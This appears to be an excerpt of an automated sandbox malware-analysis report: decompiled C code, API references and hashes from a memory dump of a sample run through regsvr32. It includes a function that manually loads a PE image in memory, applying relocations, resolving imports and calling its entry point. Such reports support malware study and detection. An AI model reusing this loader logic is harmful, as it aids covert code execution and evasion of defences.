                                                                                                                                                                        0x049e53b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e53b3
                                                                                                                                                                        0x049e52eb
                                                                                                                                                                        0x049e52eb
                                                                                                                                                                        0x049e52f1
                                                                                                                                                                        0x049e52f3
                                                                                                                                                                        0x049e52f8
                                                                                                                                                                        0x049e52f8
                                                                                                                                                                        0x049e52fa
                                                                                                                                                                        0x049e5329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5329
                                                                                                                                                                        0x049e52fc
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x049e52db
                                                                                                                                                                        0x049e51de
                                                                                                                                                                        0x049e51ec
                                                                                                                                                                        0x049e51ff
                                                                                                                                                                        0x049e5204
                                                                                                                                                                        0x049e520a
                                                                                                                                                                        0x049e520c
                                                                                                                                                                        0x049e5224
                                                                                                                                                                        0x049e5229
                                                                                                                                                                        0x049e5232
                                                                                                                                                                        0x049e5238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5238
                                                                                                                                                                        0x049e5214
                                                                                                                                                                        0x049e521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e521d
                                                                                                                                                                        0x049e51b1
                                                                                                                                                                        0x049e51b1
                                                                                                                                                                        0x049e51b7
                                                                                                                                                                        0x049e51b9
                                                                                                                                                                        0x049e51c6
                                                                                                                                                                        0x049e51c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51ca
                                                                                                                                                                        0x049e51ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51ce
                                                                                                                                                                        0x049e51bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51bf
                                                                                                                                                                        0x049e5188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5113
                                                                                                                                                                        0x049e511e
                                                                                                                                                                        0x049e5124
                                                                                                                                                                        0x049e5126
                                                                                                                                                                        0x049e53b5
                                                                                                                                                                        0x049e53b9
                                                                                                                                                                        0x049e53be
                                                                                                                                                                        0x049e53c0
                                                                                                                                                                        0x049e53c6
                                                                                                                                                                        0x049e53c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: a52a2b410f394ea9b65ef8e3513b9270d0068a2c5ca53c6561c84436ba886115
                                                                                                                                                                        • Instruction ID: e2802bc2a2de9f6eb4e2be9e153f21cbb0952ee657d63be09ba1185bb28c87f7
                                                                                                                                                                        • Opcode Fuzzy Hash: a52a2b410f394ea9b65ef8e3513b9270d0068a2c5ca53c6561c84436ba886115
                                                                                                                                                                        • Instruction Fuzzy Hash: 4981E171704301ABE716EFA2D844F7A77EAEBC4328F14493DE5558B290EB74F8058B41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E049EDE26(WCHAR* __ecx) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				WCHAR* _v140;
                                                                                                                                                                        				WCHAR* _v144;
                                                                                                                                                                        				short _v664;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                        				int _t40;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				int _t44;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t51 = 0;
                                                                                                                                                                        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                        				_t44 = _v8;
                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                        				_v12 = _t28;
                                                                                                                                                                        				if(_t44 <= 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t29;
                                                                                                                                                                        					return _t29;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                        					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                        					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                        						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                        						_t40 = lstrlenW(_t49);
                                                                                                                                                                        						_t45 = 0;
                                                                                                                                                                        						if(_t40 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t44 = _v8;
                                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						}
                                                                                                                                                                        						do {
                                                                                                                                                                        							L8:
                                                                                                                                                                        							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                        								_t49[_t45] = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                        						} while (_t45 < _t40);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_t28 = _v12;
                                                                                                                                                                        					_t41 = _t41 + 1;
                                                                                                                                                                        				} while (_t41 < _t44);
                                                                                                                                                                        				if(_t51 != 1) {
                                                                                                                                                                        					if(__eflags <= 0) {
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t52 = _v140;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                        						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t52);
                                                                                                                                                                        						_push(0x49fc9a0);
                                                                                                                                                                        						_t36 = E049E9A5A( &_v664);
                                                                                                                                                                        						_v12 = _t36;
                                                                                                                                                                        						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                        						E049E8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t52 = _v144;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}






















                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 049EDE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 049EDE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 049EDE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 049EDEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 049EDF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 049EDF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 5fdb4c11261d27ee297ed67306223013aa53ac0856287bfc23242907a00a8985
                                                                                                                                                                        • Instruction ID: aa9d7fe23f2e4d7f86929e14f50dbdacb220ec10c282dfb35b3f4dd8aa7bee20
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fdb4c11261d27ee297ed67306223013aa53ac0856287bfc23242907a00a8985
                                                                                                                                                                        • Instruction Fuzzy Hash: C631D271900117EBEB2AAB5AC88CBBDB779EF55310F144A7DE806E2094E770A9808B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 049EE672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E049F3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                        				signed short _v12;
                                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				signed int* _v24;
                                                                                                                                                                        				unsigned int _v28;
                                                                                                                                                                        				signed short* _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr* _v48;
                                                                                                                                                                        				signed short* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				unsigned int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				_Unknown_base(*)()* _v68;
                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				unsigned int _v88;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				signed int _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				CHAR* _v116;
                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                        				signed int _v132;
                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				intOrPtr _t320;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        				_v20 = _v84;
                                                                                                                                                                        				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                        				_v64 = _t320;
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L13:
                                                                                                                                                                        					while(0 != 0) {
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(8);
                                                                                                                                                                        					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						if(_a16 == 0) {
                                                                                                                                                                        							L54:
                                                                                                                                                                        							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_a12 != 0) {
                                                                                                                                                                        								 *_a12 = _v80;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                        							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v124 != 0) {
                                                                                                                                                                        								if(_v44 == 0) {
                                                                                                                                                                        									L77:
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_a20 != 1) {
                                                                                                                                                                        									if(_a20 != 2) {
                                                                                                                                                                        										L75:
                                                                                                                                                                        										while(0 != 0) {
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L77;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(0 != 0) {
                                                                                                                                                                        									}
                                                                                                                                                                        									_v132 = _v44;
                                                                                                                                                                        									goto L75;
                                                                                                                                                                        								}
                                                                                                                                                                        								while(0 != 0) {
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44();
                                                                                                                                                                        								goto L75;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(8);
                                                                                                                                                                        						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v128 = 0x80000000;
                                                                                                                                                                        						_t216 = 8;
                                                                                                                                                                        						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                        						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                        						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                        						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                                                                                                        						while(_v40 < _v104) {
                                                                                                                                                                        							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                        							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                        							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                        								_v40 = _v40 + 1;
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							_v44 = _v120;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v44 != 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v96 = 0x80000000;
                                                                                                                                                                        					_t233 = 8;
                                                                                                                                                                        					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						if(_v36 == 0) {
                                                                                                                                                                        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v16 == 0) {
                                                                                                                                                                        								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v24 =  *_v16 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v72 = _v72 & 0x00000000;
                                                                                                                                                                        							while( *_v24 != 0) {
                                                                                                                                                                        								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                        									_v100 =  *_v24 + _a4;
                                                                                                                                                                        									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                        									 *_v24 = _v68;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v24 =  &(_v24[1]);
                                                                                                                                                                        								_v72 = _v72 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v16 = _v16 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t273 = 0xfffffffd;
                                                                                                                                                                        							return _t273;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t278 = 8;
                                                                                                                                                                        				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                        				_t280 = 8;
                                                                                                                                                                        				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                        				while(0 != 0) {
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_v56 > 0) {
                                                                                                                                                                        					_v28 = _v52[2];
                                                                                                                                                                        					_v56 = _v56 - _v28;
                                                                                                                                                                        					_v28 = _v28 - 8;
                                                                                                                                                                        					_v28 = _v28 >> 1;
                                                                                                                                                                        					_v32 =  &(_v52[4]);
                                                                                                                                                                        					_v92 = _a4 +  *_v52;
                                                                                                                                                                        					_v60 = _v28;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_v88 = _v60;
                                                                                                                                                                        						_v60 = _v60 - 1;
                                                                                                                                                                        						if(_v88 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                        						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                        						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                        						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                        							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                        								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v32 =  &(_v32[1]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v52 = _v32;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L13;
                                                                                                                                                                        			}

                                                                                                                                                                        0x049f3e04
                                                                                                                                                                        0x049f3e07
                                                                                                                                                                        0x049f3e0a
                                                                                                                                                                        0x049f3e11
                                                                                                                                                                        0x049f3e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3e23
                                                                                                                                                                        0x049f3e31
                                                                                                                                                                        0x049f3e3c
                                                                                                                                                                        0x049f3e46
                                                                                                                                                                        0x049f3e5e
                                                                                                                                                                        0x049f3e6b
                                                                                                                                                                        0x049f3e6b
                                                                                                                                                                        0x049f3e48
                                                                                                                                                                        0x049f3e53
                                                                                                                                                                        0x049f3e53
                                                                                                                                                                        0x049f3e72
                                                                                                                                                                        0x049f3e72
                                                                                                                                                                        0x049f3e7a
                                                                                                                                                                        0x049f3e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 049F3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 049F3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049F3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049F3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 049F4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 012152bb7add481689419c0479f8882c46909875c2ba13718f120214a915217f
                                                                                                                                                                        • Instruction ID: 6edf1726ec780d0d00e1c6f6ba6b2aa6cef091259b738974a7caa269a2e93ef8
                                                                                                                                                                        • Opcode Fuzzy Hash: 012152bb7add481689419c0479f8882c46909875c2ba13718f120214a915217f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE1C174A10209DFDB24CFA8C984AAEBBF5FF08314F148569EA15EB351D734A951CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: 09a223cbd91c81b2aec74119f386dc395d33e738c8b1761b4648effef375c5f8
                                                                                                                                                                        • Instruction ID: 4c8dfce8676275cc7bd46bebf05351ca19fe33ba308ebfc72aea9c439d1695ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 09a223cbd91c81b2aec74119f386dc395d33e738c8b1761b4648effef375c5f8
                                                                                                                                                                        • Instruction Fuzzy Hash: AA41A271710205EBEB294EA89D9FBBE3A5DDF41314F180536FB02A6244F262FDA097D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E049F3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				char* _t31;
                                                                                                                                                                        				char* _t33;
                                                                                                                                                                        				char* _t35;
                                                                                                                                                                        				char* _t37;
                                                                                                                                                                        				char* _t38;
                                                                                                                                                                        				long long* _t40;
                                                                                                                                                                        
                                                                                                                                                                        				_t30 = __edi;
                                                                                                                                                                        				_t12 = _a20;
                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                        					_t12 = 0x11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                        				_push(_t25);
                                                                                                                                                                        				 *_t40 = _a12;
                                                                                                                                                                        				_push(_t12);
                                                                                                                                                                        				_push("%.*g");
                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                        				_push(_t35);
                                                                                                                                                                        				L049F34D2();
                                                                                                                                                                        				_t23 = _t12;
                                                                                                                                                                        				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E049F3352(_t12, _t35);
                                                                                                                                                                        					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_push(_t30);
                                                                                                                                                                        						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                        						_t31 = _t37;
                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t13 = _t23;
                                                                                                                                                                        							L17:
                                                                                                                                                                        							return _t13;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t38 = _t37 + 1;
                                                                                                                                                                        						_t33 = _t31 + 2;
                                                                                                                                                                        						if( *_t38 == 0x2d) {
                                                                                                                                                                        							_t38 = _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						while( *_t33 == 0x30) {
                                                                                                                                                                        							_t33 = _t33 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t33 != _t38) {
                                                                                                                                                                        							E049E8CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                        							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t6 = _t23 + 3; // 0x49f1b64
                                                                                                                                                                        						_t12 = _t6;
                                                                                                                                                                        						if(_t12 >= _a8) {
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t35[_t23] = 0x302e;
                                                                                                                                                                        						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                        						_t23 = _t23 + 2;
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}













                                                                                                                                                                        0x049f3415
                                                                                                                                                                        0x049f3421
                                                                                                                                                                        0x049f342b
                                                                                                                                                                        0x049f342b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33df
                                                                                                                                                                        0x049f33e5
                                                                                                                                                                        0x049f33ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33ea
                                                                                                                                                                        0x049f33c7

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: 4025dfa8656f7153607d9728c22a10162f96773b19e0b4f67f36d4e7526f2d4c
                                                                                                                                                                        • Instruction ID: 23263cee8c643544f47296e0ebd9c745b147e6516e158d56254dba1d4a71a6a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 4025dfa8656f7153607d9728c22a10162f96773b19e0b4f67f36d4e7526f2d4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 362180B274461537E7329E98DC81FAB3B4CAF81354F544135FF449B140E7A9F94043A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E049E377F(void* __fp0) {
                                                                                                                                                                        				signed int _v144;
                                                                                                                                                                        				signed int _v152;
                                                                                                                                                                        				char _v160;
                                                                                                                                                                        				char _v164;
                                                                                                                                                                        				char _v168;
                                                                                                                                                                        				signed int _v172;
                                                                                                                                                                        				char _v176;
                                                                                                                                                                        				intOrPtr _v180;
                                                                                                                                                                        				signed int _v184;
                                                                                                                                                                        				signed int _v188;
                                                                                                                                                                        				signed int _v192;
                                                                                                                                                                        				signed int _v196;
                                                                                                                                                                        				char _v200;
                                                                                                                                                                        				signed int _v204;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				unsigned int* _t104;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				signed int _t127;
